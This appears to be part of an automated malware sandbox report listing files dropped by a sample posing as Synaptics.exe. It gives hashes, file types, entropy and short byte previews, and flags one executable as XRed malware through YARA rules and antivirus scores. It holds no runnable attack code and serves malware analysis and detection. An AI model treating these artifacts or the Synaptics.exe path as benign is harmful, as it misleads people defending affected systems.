                                                                                            SHA-512:A48C581FA97FA55FE1E5736CC16DBB2721308E3EFE1523999B0F5EA8DD154F7B1D3BDFF1C1D41A90AB40E257DDC53C63FE00D541ED86D56A7383D37900A829C6
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.2651283976115355
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0BdkSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK++dk+pAZewRDK4mW
                                                                                            MD5:B325BCD25D049056AD0EDF5148FE731B
                                                                                            SHA1:02449254FADDD2D02612AB45B4D6A443BD0DE7E3
                                                                                            SHA-256:97B636532532DD29CECC5E9038C30690E1E86F8FF23A4BE9C4E408E41F04776F
                                                                                            SHA-512:C45CB8E6C029FB6AEBB6C681CC3F73E873F4DCA2D5D6179135956D1DCC77E0C5A5F9653A71CFB31D59C129F8826CA16693B0D9B787C800B6A6683C3C509B9E9A
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.264690092783497
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+089SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+/+pAZewRDK4mW
                                                                                            MD5:537A29C41225CC53437EFE2ED66398A6
                                                                                            SHA1:EDD4FCF2458C94F132056FFEFEAD14264D1DCA78
                                                                                            SHA-256:BA2AF12CDEBAF3FBFF8A48912410134F41BD524556B8EDE8945370696FCC4F68
                                                                                            SHA-512:8191DC71679CC3FBC8604B5AD256A88FDFAF6F363397036116C8848BCE12BC0046419040F1C91319D2FD00821637CC199145EF2237305A8BB90143978F9945AC
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.2669746009996965
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0ywSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+tw+pAZewRDK4mW
                                                                                            MD5:EA03BE47D379D3B5C1E3F645FF014B69
                                                                                            SHA1:A9821301EB1FD90E24DAE9AF5EC5782F79620C5B
                                                                                            SHA-256:49E4BC7F359BA9C5A06CFF6C39B026053C1A30DFCFE7D1E30CE72514D5C361E1
                                                                                            SHA-512:1E5031680511C0DBAD69D0206A6B56E3D021A1EA4169994E59FA7CBB00CE2FE1BCAAC6860B626E21A2C9CBCE5106ABD9645CE883642D3C1A6682D26A5938CE08
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.254442290959029
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0VSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+++pAZewRDK4mW
                                                                                            MD5:FB46B669B4F8FF3C4776965A5CFA59A8
                                                                                            SHA1:F7F03962519F0C8A2FE420689F72E5DCBCB8A4E8
                                                                                            SHA-256:A57069AEAB49B0AC3A0B1AFBA7E8D698EA5D2BBEA33116EC287FEA09E62AD53A
                                                                                            SHA-512:D0ED014EF390991DA5F26692A44573B9E4EDBD7F3AE303D2D887322750689A64BEE8CFCE5BF4666E22C8626197A172011B63E45BE79922B23F50BE6A6EAEB9DF
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.255438798505019
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0e4SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+k+pAZewRDK4mW
                                                                                            MD5:8012FD49FC7714735F11EDD7360C56EF
                                                                                            SHA1:635312D5095148B9579C1FB6CEBCA18EEFDC0176
                                                                                            SHA-256:E50A7541864D6B34AE9FD399877FBAA59050C02051B7A12F32C961FC0C927AFD
                                                                                            SHA-512:F3E548824E0A54D59ED0965792D5354CE1B868904513DDBEE52B415788F408C719D88678D5DF5248E70E8A09B9F84303B88A1E03A77F595038E2600A459386E5
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.246916367870839
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0d5xSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+c5x+pAZewRDK4mW
                                                                                            MD5:F986CCB98EC7E6CFAB59820F539B9619
                                                                                            SHA1:ECA2BADCC1885482CAD1E3AE059CEF65EFFAB2E3
                                                                                            SHA-256:2F5C86C06CE8F49C34F585D4EB12DBF061DF8CC712B4A487AFE153D533819FF9
                                                                                            SHA-512:01D5683A3CC8EEC2491442FB7D9B4729554044B7E426B997E9D9E5781CEBD8262773795CF416AD3DB30325CFCAB22DBF85BA244387E5F5275BEE987A1A1B5268
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.273974109035691
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+00SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+f+pAZewRDK4mW
                                                                                            MD5:239B40444E493B0047ECDBD741854090
                                                                                            SHA1:0133BBD814BD42B5AE8C509A7DB3B1D9274229B7
                                                                                            SHA-256:D8E6F94C1063699E4DEE03D59C4FFC92646986190ACE6604E7431066EC0EF2D1
                                                                                            SHA-512:A758DAA6C8626E8D841DF076D5917117B102E7757673FE558259D13E83E3D85FEBD9136AB0E20118107EEDC235D588A7CF75E047E512D12EA6F29058895564A6
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.26090581278965
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0QISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+dI+pAZewRDK4mW
                                                                                            MD5:D84B4AD4171E7E4091ACC2D4DAF14F2D
                                                                                            SHA1:310B0EC98EC6CB57762C1CCA6E592858D0002B39
                                                                                            SHA-256:D237D2C2C8CEF782EA8CB857139D4BBC01A99CFB0F1D9C6C5E5DBDD52DA42830
                                                                                            SHA-512:B4F393C679A2BCE5D1369673E4D53A349D6975E2904353C5A449167BA3115AC3B521EBEFD2CB9B355765C25C91B7E561E15335B16640170A80A15191FA788A24
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.256461469503897
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+09xQe3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Kb3+pAZewRDK4mW
                                                                                            MD5:01B8B61D1EF56F8F0C1C1413101F0368
                                                                                            SHA1:90F46978EBCBB265939A00CBDD83E7BEBAD32B10
                                                                                            SHA-256:6F8A2262FD34FB14CA920CE71C80C7113B2AAB5A89FA9347799D343AA0774EA5
                                                                                            SHA-512:23AE88715324B7FCB81BD901A60891C4494E1C84A9D4E75EBDB9597FEA331CC25D020A31256F756504F83DD5C88E6797B561C5F3BD158870F44FE2A635FEBEE8
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.266078204969841
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0GhSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+T+pAZewRDK4mW
                                                                                            MD5:FF45F620EEF5ED51A13AB4B8BE209D3E
                                                                                            SHA1:26E784AAC33B24A459DF27B82E2FE2FF347B8337
                                                                                            SHA-256:22873BBEBAAABAF98F1E315046AB6D5C460F415979E7866B150BD79F944BD841
                                                                                            SHA-512:8E6F473E9F4806D849875474961EB6E49E29C051D2A78DEAA3811A4755337D88195D8ABC9C26487D6273326263652E4E9DED6DEF84F631FE3BBCA14AA8EF0649
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.260084626057697
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0SnSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+P+pAZewRDK4mW
                                                                                            MD5:6AC6647248A1C6D54EC71FB73F81DF95
                                                                                            SHA1:E8AE6FB30E8F05FEB82D1910219119D3C5A44725
                                                                                            SHA-256:529E9BB2069965CA2C7F8D58A01FA5F83F9603F1B45E4857B087324DA0FDE3C2
                                                                                            SHA-512:5442988330EEFFC75884023009240CB5D3E8FCE8A9E8614374218BCC2268E8A513CCD9A43A067F193F2B43CCB6AC34EE8EC35DBBB37086D07D88F82F8B4A116C
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.266119648604836
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0BnDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK++D+pAZewRDK4mW
                                                                                            MD5:1ADF6A17A911368783248B5E1854A85C
                                                                                            SHA1:EF6177228F6000ABC59965877EC63ADA4DC4C20C
                                                                                            SHA-256:5B0202A86D58175F64692FBE85AAF20F43BC5E5A34B528279BB9E285ADA55CC7
                                                                                            SHA-512:1B7DDA5869FE3A3FC4752BBAC49FB5848B8C5FAEF28E8E9A7FDF268A09B9FB151F422D6BD1A1242ABB3BBE2E802DA616D75F4286DEA2B258F56F8059301895ED
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:Microsoft Excel 2007+
                                                                                            Category:dropped
                                                                                            Size (bytes):18387
                                                                                            Entropy (8bit):7.523057953697544
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                            MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                            SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                            SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                            SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.2591981258323015
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0WSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+l+pAZewRDK4mW
                                                                                            MD5:99A547AB3B4CAC4B7BFDD130D7C32AAD
                                                                                            SHA1:199895644E2450A594DADD47A0C4EF267B9296F3
                                                                                            SHA-256:B32995C52E2F7121B794B2C482B53091852D9DADFD8AC4E2CB20107B2D0082C1
                                                                                            SHA-512:B27E2A599F3F94C4210B8E5EC9F039CC9366105660DECBEB44E3B6DFD8B4A4564C32AEF3B81E0C4B341EFF1304B41296C28828A61FE9E9903110A60815E49E7B
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.255257991087609
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0RSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+O+pAZewRDK4mW
                                                                                            MD5:BADBC3787869B1326690E1DD19C89C3D
                                                                                            SHA1:97B498ECCC086EAF8F3D61B15A80EE67C0DD6099
                                                                                            SHA-256:413F07F207D347C62AB8E0F16AA6E9A0358FE58CF4FA1D001D0D65C80DB875D8
                                                                                            SHA-512:1355B1535E220ADEFDFC4E687DFEBE39EB2C5D71F8F568A4C4DCCE893B260A08ACC44FAE2107EFB520113568E0E9BCA1ADF6DFACBCB4B4AB448CB08736C4DF1F
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.260989398724525
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0z/DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+W/D+pAZewRDK4mW
                                                                                            MD5:0EF27F74BF5E7CAC74FE272E3D239FCE
                                                                                            SHA1:ACBBF089CA44CA9AC5895144EC524B1A29AC4DDA
                                                                                            SHA-256:C5593267CF7795B672F67579B2F4A9E37F17C7A47A2489827FE144C0F37C9023
                                                                                            SHA-512:D02CF6898090298464EBA19F4D5F63759DD86BBFAF9D4707962DDE7D12DE391775BD550733F73EC50C93340710618B831E407BA833B44A72CCA83A43C326B84D
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.274498892722879
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+06gGzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+TgW+pAZewRDK4mW
                                                                                            MD5:7505A14C2FFA403F6D1C5B6D20254540
                                                                                            SHA1:BEDB024398896680FB9309FAB399073B93346D18
                                                                                            SHA-256:0EE6DA01D036F313D758B10F9699BB26C480C8CDCA8D661C4BFBDB470C51A7E0
                                                                                            SHA-512:C7D3D22B5A0D4B9B15397E22EC6C0CAA23488226E5D37710B0D9D9B6A6E00FED323D448AEE621E8B9B39254F3233DBF6BAE73F98C8B523BC36D4AAB0F6098D86
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.260729230890499
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0GW1SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+y1+pAZewRDK4mW
                                                                                            MD5:E11A38E33287E151A87A2FF54D49897B
                                                                                            SHA1:E48D04D9FAD9A10D378569FF85E603312A61315C
                                                                                            SHA-256:3D0F33EB26B5955EB7D1C913824DF699F1B8AEF52562B588A1FE5017D5F384C0
                                                                                            SHA-512:2E27AF8A698985DDD4711895FF1264C02A56B5774D60973541EEDCC3D1BB4967BBE4DEE8C2C37D232561A23D2D17EE11D5833C59C227E28DADB046FEB90B6F42
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.2592661538674275
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0cSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+3+pAZewRDK4mW
                                                                                            MD5:F3931AE69D4E84A3F9B8D2AB28A0403D
                                                                                            SHA1:BF24CCC24F2C0281228505AC543A6A38D8E251B0
                                                                                            SHA-256:7BEE4843E9CF75A5D7F30222365085BE8FA97A70BC0ADF765D645ECD0CCB3B15
                                                                                            SHA-512:1D7AB90175F21E20DDC38AB0B37265526FC3D33D81E05A07053A07A8DE587D3BD2F34F015D7A21F0CC648B157688EECEAC628D249DF5A66A63AACDA0F7F944E2
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.276236519500764
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+04SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+H+pAZewRDK4mW
                                                                                            MD5:D13437C0275E402F15E3419E59B6365D
                                                                                            SHA1:6B9247344B62585FCC01100C7522DD7500479E27
                                                                                            SHA-256:320824A418D41FC9E4297D39E4FB1C37A057E8C46DDC6DACB338252FDAA93CE0
                                                                                            SHA-512:D90CB155873FF1C55FED716D6B86E4DB439A13F6EB6BFFC7E30529375D2A8188B8E37A3C190CA8FC773BE9F687062F2154EEA36AC4A4AE5D4C0BD43473DDCC9B
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.246046669044378
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0fSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+s+pAZewRDK4mW
                                                                                            MD5:6C50F4624EA13301602D21A1DC1F61DB
                                                                                            SHA1:E829FB4D4FD81DC816DB2E36AE4B810E5982DC5C
                                                                                            SHA-256:0F46D54721F533C078622C0AD5A1B255A5A521ED6B29FE4FFA155AD76A95ABD7
                                                                                            SHA-512:2E8EF78BF5EF2EA16137C4402299D0E202450250835E7A13EE7A8B0BD6CB25EBE04CF0201D3C83743F58D5B47BF116651A0FECCF62A677F6F1A6270A304D39AC
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.243646386667518
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0k0zSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+N0z+pAZewRDK4mW
                                                                                            MD5:25F60CA43A78BBA355B07F102F80D19A
                                                                                            SHA1:5F9C6FAC036D7D6A9F45C9DDB7F44713451A6575
                                                                                            SHA-256:A6D7080B33EB0F3BE5828059480EEA682824EBF8D91D9B0D1DE92781D9045B3E
                                                                                            SHA-512:A42B1DED92D842551C353F34451647FC0AF2E26648B44F32EF812CE8CD5442B0D711522E2549F5B1681B6A0CD9056FA2A6014D337B1E7D8691F2C910875A4CFB
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fggc_rpKEepgXceO3IUbig">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.25111418958966
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0mKqISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+bKqI+pAZewRDK4mW
                                                                                            MD5:55299A12B51FE19812667D918BF83163
                                                                                            SHA1:3CBC3A71691824B22BF2F6895DCDF3C06B416784
                                                                                            SHA-256:29947F631D2852603D6E61AAADFFD5BD5644D2B11D000D45EE63E3C99AB911EF
                                                                                            SHA-512:9CCC6AB8566E72A306E5B52B083CC5CC0AE69E93C2FB7FD62498D9EA1FEE6F773BF06AB72BEC8544587766FCA89959AD9AAAAF53170FB3AEA648BAC9ABE2CAE8
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="iMtiXs6204lkXen1viFQ6Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):5718872
                                                                                            Entropy (8bit):7.999141578918811
                                                                                            Encrypted:true
                                                                                            SSDEEP:98304:EuLgywiNHBeSLxYK/bxE3q/BlZkWMGPQflVJ/EK1sLyzs2T2Q1mOjq4/:V7wqheSVYK/bua/BlWWnuVhsus8nm+qi
                                                                                            MD5:630D75210B325A280C3352F879297ED5
                                                                                            SHA1:B330B760A8F16D5A31C2DC815627F5EB40861008
                                                                                            SHA-256:B06546DDC8CA1E3D532F3F2593E88A6F49E81B66A9C2051D58508CC97B6A2023
                                                                                            SHA-512:B6E107FA34764D336C9B59802C858845DF9F8661A1BEB41436FD638A044580557921E69883ED32737F853E203F0083358F642F3EFE0A80FAE7932C5E6137331F
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#pA.B...B...B..gM...B...B...B..gMC..B..gMA..B..gM@..B..gMD..B..Rich.B..........................PE..L....jkG.............................c... ........... ...............................3X.......... ...................................................,W.X........... "...............................&..@............ ...............................text........ ...................... ..`.data...............................@....rsrc.............V.................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:Microsoft Excel 2007+
                                                                                            Category:dropped
                                                                                            Size (bytes):18387
                                                                                            Entropy (8bit):7.523057953697544
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                            MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                            SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                            SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                            SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                            Malicious:false
                                                                                            Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............
                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):165
                                                                                            Entropy (8bit):1.3520167401771568
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:qs/FFyGff:qsyWf
                                                                                            MD5:5C22367453CA7CD5BD7CA96C4FD55742
                                                                                            SHA1:FC7428D064740B4E331D57098AF028AA26FBC1AE
                                                                                            SHA-256:F5D3D989BFAC7CF7187B3665F8CB75AF84FD749DBE245E454E2F9F1AC562E543
                                                                                            SHA-512:BE2C202040245F25CB24C7F7B44A69F0000A95984236C3AE671443C56A7E1AE05BD7ACED71979ADF1159490770A767D25F581E76540C9C653441558BAECC0C89
                                                                                            Malicious:false
                                                                                            Preview:.user ..t.i.n.a. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):771584
                                                                                            Entropy (8bit):6.6264053582391735
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IIr:ansJ39LyjbJkQFMhmC+6GD9j
                                                                                            MD5:7407C51DD7AC30C4D79658D991A8B5D6
                                                                                            SHA1:B48603F6A1DFFAB2FF458780025F6A3C2E523C3C
                                                                                            SHA-256:1316730BBC50851C02F53254F9C57B99AF50A07BB0776332D1480BABD626F39A
                                                                                            SHA-512:38334452808E5D203B287E2F4A47B8F5BBCE1ED18FABCFA4A61B8C04429150DFBFFE2241323B3C87D90ABBABBED49A5CEA584CC1CE83BF519BB728E1D6AC18EB
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\AFWAAFRXKO\~$cache1, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\AFWAAFRXKO\~$cache1, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 94%
                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                            Category:dropped
                                                                                            Size (bytes):1835008
                                                                                            Entropy (8bit):4.394144984665256
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:sl4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuNASOBSqa:k4vF0MYQUMM6VFYSSU
                                                                                            MD5:A154257AD4D6BEA3C547A023E1A98923
                                                                                            SHA1:8A07A8AC5132E84BC190F5CE5BDD897E74D7F4D2
